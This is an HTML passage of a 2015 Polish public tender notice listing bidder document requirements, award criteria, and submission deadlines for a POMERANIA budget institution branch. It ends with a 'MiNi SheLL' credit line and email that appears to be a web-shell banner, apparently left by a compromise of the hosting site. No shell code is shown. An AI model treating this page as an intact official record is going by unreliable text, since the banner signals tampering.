</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające równoważność produktów - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas dostawy - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pigbzamowieniapubliczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża, tel. (086) 215-35-95..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2015 godzina 11:00, miejsce: Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża, tel. (086) 215-35-95 - Sekretariat...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com